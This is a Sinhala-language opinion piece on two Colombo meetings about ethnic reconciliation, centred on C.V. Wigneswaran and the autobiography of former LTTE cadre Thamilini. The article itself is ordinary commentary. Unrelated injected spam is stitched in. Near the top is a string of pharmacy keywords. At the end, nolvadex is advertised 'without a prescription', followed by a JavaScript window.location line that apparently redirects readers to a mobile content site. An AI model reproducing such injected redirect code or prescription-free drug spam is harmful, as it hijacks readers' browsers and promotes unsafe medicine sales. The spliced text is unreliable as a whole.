විග්නේස්වරන් හා තමිළිනි කොළඹට පැමිණීම

ආචාර්ය උදන් ප‍්‍රනාන්දු

order propecia pills order propecia tablets online order generic propecia … buy propecia; buy proscar; buy sildenafil; buy strattera; buy tadalafil; buy valtrex;

ගෙවුණු සතියේ ජනවාර්ගික හා දේශපාලනික වශයෙන් වැදගත්කමක් සනිටුහන් කළ රැස්වීම් දෙකක් අගනුවර පැවැත්විණි. රැුස්වීම් දෙකම පැවැත්වූයේ කොළඹ හතෙහි පිහිටි පදනම් ආයතනයේය. පළමු රැුස්වීම පැවැත්වූයේ බ‍්‍රහස්පතින්දාය. එය කුසල් පෙරේරාගේ ලිපි එකතුවක් අඩංගු Unearthed නමින් පොතක් ප‍්‍රකාශයට පත්කිරීමට සමගාමීව ‘ජාතිය ගොඩනැගීම හා සංහිඳියාව’ මැයින් පවත්වන ලද අතර ප‍්‍රධාන දේශනද්වය පැවැත්වූයේ රාවය ආරම්භක කර්තෘ වික්ටර් අයිවන් හා උතුරු පළාත් සභා ප‍්‍රධාන අමාත්‍ය සීවී විග්නේස්වරන් විසිනි. දෙවන රැු=ස්වීම පැවැත්වූයේ සිකුරාදාය. එයද පොතක් පළකිරීමක් පදනම් කරගෙනය. පොත එල්ටීටීයේ කාන්තා දේශපාලන අංශයේ හිටපු නායිකා සුබ‍්‍රමනියම් සිවකාමි හෙවත් තමිළිනි විසින් ‘තියුණු අසිපතක සෙවණ යට’ මැයින් රචිත ස්වයං චරිතාපාදනයේ සිංහල පරිවර්තනයය. පළමු රැස්වීම සිය දෙනෙකුගේ පමණ සහභාගිත්වය ඇතිව පදනම් ආයතනයේ පිරී ගිය කුඩා ශාලාවක පැවැත්විණි. දෙවැනි රැුස්වීම එම ආයතනයේ ම ප‍්‍රධාන ශාලාවේ පැවැත්වූ අතර එය පිරෙන්නම පිරිසක් සිටියහ. රැස්වීම් දෙකම ආවරණය කිරීම සඳහා මාධ්‍ය ආයතන විශාල ප‍්‍රමාණයක් පැමිණ සිටි බව දක්නට ලැබිණ. මෙම රැස්වීම් දෙකටම පොදු පිරිසක්ද පැමිණ සිටි අතර ඒ ඒ රැස්වීමට ආවේණික විශේෂ පිරිස්ද සිටි බව කිව යුතුය. මමද රැස්වීම් දෙකටම සහභාගි වුණෙමි. රැස්වීම් දෙකෙහිම සාමාන්‍යයෙන් දක්නට නැති ජීවයක් තිබුණි. දෙකෙහි ගතිකත්වයද ඊටත් වඩා ඒවාට නිමිති වූ දමිළ චරිත හා ඔවුන් වටා විහිදෙන දේශපාලන ආවාටද සමකාලීන ජනවාර්ගික කතිකාවට වැදගත් බව මා විශ්වාස කරන හෙයිනි මේ කෙටි සටහන.

තම පොත ලියන කල තමිළිනිගේ ක‍්‍රියාකාරී දේශපාලන දිවියද යුද්ධයද අවසනකට පැමිණ තිබිණ. ඒ වන විට ඇය පුනරුත්ථාපනයෙන් අනතුරුව දේශපාලන අවකාශයෙන් කුටුම්බ අවකාශයකට රූපාන්තරණයවී සිටින්නීය. ගාමිණි වියන්ගොඩ සභාව අමතා කී පරිදි තම චරිතාපදානයෙන් තමිළිනි කරන්නී අන්තරාවලෝකනයකි (introspection). සන්නද්ධ අරගලයක නිරත දශක දෙකක පමණ කාලය දෙස ඇය නෙත් යොමන්නී ස්වයං විවේචනාත්මකවය. ඈ මෙනෙහි කරන්නී තමා ගැනමය; තමා කොටසක්ව සිටි සන්නද්ධ අරගලය ගැනය. තම දබරැුඟිල්ල දිගු කරන්නී තමා දෙසටමය. දැඩි වෙහෙසකට පසුව ගිමන් නිවමින් දැමුණු සිතකිනි තමිළිනි තම ආත්ම ප‍්‍රකාශනය කරන්නී. විනිසුරකු ගතකළ අන්තර්වර්තික (introverted) හා දැමුණු වෘත්තීය අවකාශයකින් දැඩි කුණාටු සහිත දේශපාලන අවකාශයකට විනිසුරු විග්නේස්වරන් ගමන් කරන්නේ යුද්ධයේ නිමාවත් සමගය. හෙතෙම බ‍්‍රහස්පතින්දා කොළඹ පැවැති රැුස්වීම අමතන්නේ දැඩි කලකිරීමකිනි; ආවේගයකිනි. විනිසුරු විග්නේස්වරන් තම ඇඟිල්ල දිගු කරන්නේ තමාට නොව දකුණටය; මධ්‍යම ආණ්ඩුවටය. ඒ අතීතය ගැන නොව වර්තමානය ගැනය. නිමාවූ කාලාන්තරයක් ගැන මෙනෙහි කිරීමෙන් තමිළිනි නියැළෙන අභ්‍යාසය සංහිඳියාව අරභයා වැදගත් ය. එම අභ්‍යාසය එක්තරා ලෙසකට පහසු වන්නේ එය එදිනෙදා අභියෝගවලින් වියුක්ත වී තරමක දුරස්ථව කළ හැකි ක‍්‍රියාවක් බැවිනි (මෙයින් තමිළිනි කළ ස්වයං විවේචනය අඩු ලන්සුවකට දැමීමක් නොකෙරේ*. එවැනි වියුක්ත හා දුරස්ථවීමට තරම් සුඛෝපභෝගිත්වයක් විනිසුරු විග්නේස්වරන්ට නොමැත. ඔහු ඉදිරියේ ඇති අභියෝගය පශ්චාත් යුද සමයක ඇති අතිශය දුෂ්කර එකකි. එක් අතකින් විග්නේස්වරන් දේශීය හා ඩයස්පෝරා දමිළ දේශපාලන බලවේග සමතුලනය කරගනිමින්, දමිළ ජනතාවගේ අභිලාෂයන් නියෝජනය කරමින් උතුරු පළාත් සභාව තුළ ක‍්‍රියාත්මක විය යුතුය. අනෙක් අතින් ඔහු මධ්‍යම ආණ්ඩුව සමග සහයෝගයෙන් වැඩ කළයුතු අතර කේවල් කිරීම ඇතුළු ප‍්‍රති-බලවේගයක් ලෙසද ක‍්‍රියාත්මක විය යුතුය. මෙය පහසු අභ්‍යාසයක් නොවේ.

තමිළිනි තම චරිතාපදානයේ යම්තාක් දුරකට පශ්චාත්තාපයකින් යුතුව තම දේශපාලන අතීතය ගැන මෙනෙහි කරන්නීය. එය ගැඹුරු අර්ථයකින් දකුණේ සමාජය භාරගනීදැයි මට සැකසහිතය. මේ සම්බන්ධයෙන් දමිළ බසින් තමිළිනි විසින් රචිත පොත සිංහලට පරිවර්තනය කළ සාමිනාදන් විමල් ගැඹුරු කරුණු කිහිපයක් සිකුරාදා රැුස්වීමේදී මතුකළේය. බොහෝ දෙනා එල්ටීටියේ යුද රහස් දැනගැනීමේ කුතුහලයකින් පොත කියවන්නට යොමුවුවොත් තමිළිනිගේ අභ්‍යාසයේ දේශපාලන හා සංහිඳියාත්මක වටිනාකම ලඝුවෙතැයි සාමි අනතුරු හැඟවීය. මගේ අදහස අනුව බොහෝ විට බහුතර දකුණ තමිළිනිගේ ස්වයංචරිතාපදානය අර්ථ නිරූපණය කරන්නට ඉඩ ඇත්තේ නොමඟට ගිය නමුත් පසුව ඒ ගැන ඒත්තු ගැන්වී පසුතැවිලි වූ එකියක ලෙසය. එනයින් දේශපාලනිකව වැඩි කරදරයක් නැතිව තමිළිනිට කොළඹ/දකුණේ කතිකාවතේ ගැවසෙන්නට ඉඩහසර තිබේ. ඇය අකාලයේ මිය නොගියා නම් වාච්‍යාර්ථයෙන් ද ඇයට කොළඹ නිතර යන්න එන්නද හැකිව තිබුණි. තමිළිනි එසේ ආවා නම් එන්නේ දුරබැහැරක් වන පරන්තන් සිටය. ඒ තත්ත්වය හා සසඳන කල විනිසුරු විග්නේස්වරන්ගේ කොළඹ ගමන-බිමන වෙනස් ය. කොළඹ හදවතේම ස්ථිර පදිංචිකරුවකු වන විනිසුරු විග්නේස්වරන් කොළඹ පැවතෙන සංවාද, වැඩමුළු, සම්මන්ත‍්‍රණ අභ්‍යාසවල දකින්නට ලැබෙන්නේ හාවා හඳ දකිනවාටත් වඩා අඩුවෙනි. මගේ මතකය අනුව අවසන් වරට ඔහු කොළඹ මහජන රැුස්වීමක් අමතා කතාකළේ වසර දෙකකට ඉහතය. ඒ බර්නාඞ් ද සොයිසා අනුස්මරණ දේශනය කරන්නටය. එය පැවතියේ කොළඹ සාමාන්‍යයෙන් සංවාද පැවැත්වෙන අවකාශයක නොව වැල්ලවත්තේ කාර්යබහුල පටු පාරක පිහිටා ඇති දමිළ සාහිත්‍ය සංගම් ශාලා පරිශ‍්‍රයකය. විනිසුරු විග්නේස්වරන් කොළඹ-මධ්‍යම පාන්තික අර්ථයෙන් ගත් කල ‘තැනකට ගෙන ගිය හැකි’ (presentable) අයෙකි. රෝයල් කොලීජියට ගිය, කොළඹ හතේ වෙසෙන හෙතෙම ප‍්‍රකට සිංහල දේශපාලනඥයෙකුගේ මස්සිනාද වෙයි. මේ සියලූ සබඳතා තියෙද්දීත් ඔහු කොළඹ සංවාද කතිකාවේ නැත්තේ මන්දැයි මා නිතර සිතන දෙයකි. මෙවැනි කතාවකට විනිසුරු විග්නේස්වරන්ට කුසල් පෙරේරා ආරාධනා කරන්න තැත්කළේ වසර දෙකකට පමණ පෙර සිටය. පදනම් ආයතනය අසලම පිහිටා ඇති තවත් ශාලාවකට අත්තිකාරමක්ද ඔහු ගෙවූ බව මම දනිමි. කොළඹ රැුස්වීමකට සහභාගිවීමට විග්නේස්වරන් තුළ යම් දෙගිඩියාවක් තිබුණු බව අනුමාන කළ හැක්කේ ඔහු ආරාධනාවට නිශ්චිත ප‍්‍රතිචාරයක් දෙන්නට තරමක කාලයක් ගත් නිසාවෙනි. ඔහු එසේ කරන්නේ කොළඹ සිංහල සමාජය ගැන ප‍්‍රමාණාත්මකව තවමත් ගොඩනැගී නොමැති විශ්වාසය නිසාද? විග්නේස්වරන්ට ඇඟිල්ල දික් කරන්නට පෙර මා කරන්නේ කොළඹ බහුතර සිංහල සමාජය ප‍්‍රශ්න කිරීමය. අප විග්නේස්වරන් වැන්නෙකු සමග දේශපාලන සංවාදයක නියෙලෙන්නට මැලිවෙන්නේ මන්ද? ඒ ඔහු අප සිතන පතන තාලයටම නටන අයකු නොවීම නිසාවෙන්ද? තමිළිනි මෙන් පසුතැවිල්ලකින් කතා නොකරන නිසාවෙන්ද?

මා දකින ආකාරයට, විනිසුරු විග්නේස්වරන් පශ්චාත් යුද සන්දර්භයේ දමිළ දේශපාලන බලවේගවල සංහිඳියාව අරභයා ශක්‍යතාවද ඒ සම්බන්ධයෙන් නොවිසඳුණු ප‍්‍රතිවිරෝධතාද නියෝජනය කරන ප‍්‍රපංචයකි. විග්නේස්වරන් නියෝජනය කරන උතුරු පළාතේ තවමත් ප‍්‍රමාණවත් ලෙස ආමන්ත‍්‍රණය නොකළ ප‍්‍රශ්න ගණනාවක් ඇත. හමුදා කඳවුරු, යුද සමයේ අත්පත් කරගත් පුද්ගලික ඉඩම්, යුද්ධයෙන් අවතැන් වූ පිරිස් ආදිය උදාහරණය. එම ප‍්‍රශ්න අතිශයින් සංකීර්ණය. එබැවින් ඔහුගේ පණිවිඩය දකුණේ ජනතාවට තමන්ට කැමති ආකාරයෙන් අර්ථගන්වා ගෙන පහසුවෙන් ජීරණය කරගත හැකි දෙයක් හෝ සරල රෝමාන්තික දෙයක් නොවේ. විනිසුරු විග්නේස්වරන්ගේ පුද්ගලික අදහස් හා ක‍්‍රියාකලාපය දමිළ ප‍්‍රජාව තුළද ආන්දෝලනාත්මකය; විවාදපන්නය. එහෙත් එය ඔහු සමග අප සංවාදයක නිරත වීම වළකා ලිය යුතු හේතුවක් නොවේ. ‘අවසන් වුණේ යුද්ධය මිසක ප‍්‍රශ්නය නොවේයැ’යි රැුස්වීමේදී සාමිනාදන් විමල් මතු කළ අදහස ඉතා වැදගත්ය. සංහිඳියාව පදනම් කරගෙන ජනවාර්ගික ප‍්‍රශ්නය විසඳීම එක රැුයකින් කළ හැකි පිරිතක් නොවේ. එය විවිධ දේශපාලන බලවේගවල කේවල් කිරීම්ද ප‍්‍රතිවිරෝධතාදවලින් ගහන සංකීර්ණ ක‍්‍රියාදාමයකි. සංකීර්ණ ප‍්‍රශ්නවලට සරල උත්තර සොයාගත නොහැක. එම සංකීර්ණ විසඳුම් මතුකරගත හැකි කතිකාවත ගොඩනැගෙන්නේ දේශපාලන සංවාද තුළිනි. ඒ අර්ථයෙන් එළඹුණු සතිය තුළ කොළඹ පැවැති රැුස්වීම් දෙක, ඒ වටා ගොඩනැගුණු උනන්දුව, සාමකාමී ලෙස එම කටයුතු කරගෙන යෑමට හැකිව තිබූ පරිසරය සාධනීය වර්ධනයකි. විනිසුරු විග්නේස්වරන්ගෙන් නොනැවතී විපක්ෂ නායක සම්බන්ධන් ඇතුළු ප‍්‍රධාන ධාරාවේ සිටින සෙසු දේශපාලන දමිළ නායකත්වය සමග පමණක් නොව විකල්ප ධාරාවන් නියෝජනය කරන දමිළ දේශපාලන ක‍්‍රියාකාරීන් සමගද සංවාදය අඛණ්ඩව කළ යුතුය. විග්නේස්වරන් හා තමිළිනිට කොළඹට එන්න දකුණේ පිරිස් කළ ආරාධනය හා ඊට ඔවුන් දැක්වූ යහපත් ප‍්‍රතිචාරය අර්ථාන්විත සංවාදයක් තුළින් සංහිදියාවක් ගොඩනැගීමේ බලාපොරොත්තු දල්වාලන්නට සමත් වෙතැයි මට සිතේ.

buy nolvadex 20 mg pills without script, buy nolvadex 10 mg without a prescription, nolvadex pharmacies that do not require a prescription, non prescription … window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;